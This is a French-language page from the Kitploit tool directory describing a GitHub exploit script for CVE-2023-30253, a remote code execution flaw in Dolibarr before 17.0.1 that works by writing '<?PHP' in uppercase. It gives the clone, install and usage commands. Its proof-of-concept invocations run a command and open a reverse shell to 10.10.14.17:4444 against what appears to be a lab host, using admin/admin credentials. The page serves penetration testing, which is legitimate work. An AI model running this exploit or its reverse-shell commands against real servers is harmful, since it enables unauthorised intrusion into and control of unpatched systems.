Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2023-30253 — Dolibarr avant 17.0.1 permet l'exécution de code à distance par un utilisateur authentifié via une manipulation en majuscules : <?PHP au lieu de <?php dans les données injectées. | Kitploit
Outils/GitHubGitHub/rubikcuv5/cve-2023-30253
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubrubikcuv5/cve-2023-30253

cve-2023-30253

Dolibarr avant 17.0.1 permet l'exécution de code à distance par un utilisateur authentifié via une manipulation en majuscules : <?PHP au lieu de <?php dans les données injectées.

Voir le dépôt
7il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-30253

image

Description

Dolibarr avant 17.0.1 permet l'exécution de code à distance par un utilisateur authentifié via une manipulation de la casse : <?PHP au lieu de <?php dans les données injectées.

Documentation

  • CVE-2023-30253
  • Avis GitHub : GHSA-9wqr-5jp4-mjmh

Configuration

root@kitploit:~
git clone https://github.com/Rubikcuv5/cve-2023-30253.git

pip3 install -r requirements.txt

python3 CVE-2023-30253.py -h

UTILISATION

root@kitploit:~
usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)

Analyseur d'arguments

options:
  -h, --help            afficher ce message d'aide et quitter
  --url URL             URL du site web
  -u USER, --user USER  Nom d'utilisateur
  -p PASSWORD, --password PASSWORD
                        Mot de passe
  -c COMMAND, --command COMMAND
                        Commande à exécuter
  -r ip port, --reverseshell ip port
                        Adresse IP et port du reverse shell

EXEMPLES POC

Exécuter une commande

root@kitploit:~
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"

image

Obtenir un reverse shell

root@kitploit:~
 python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r  10.10.14.17  4444

image

Auteur

  • Rubickcuv
Télécharger l’outil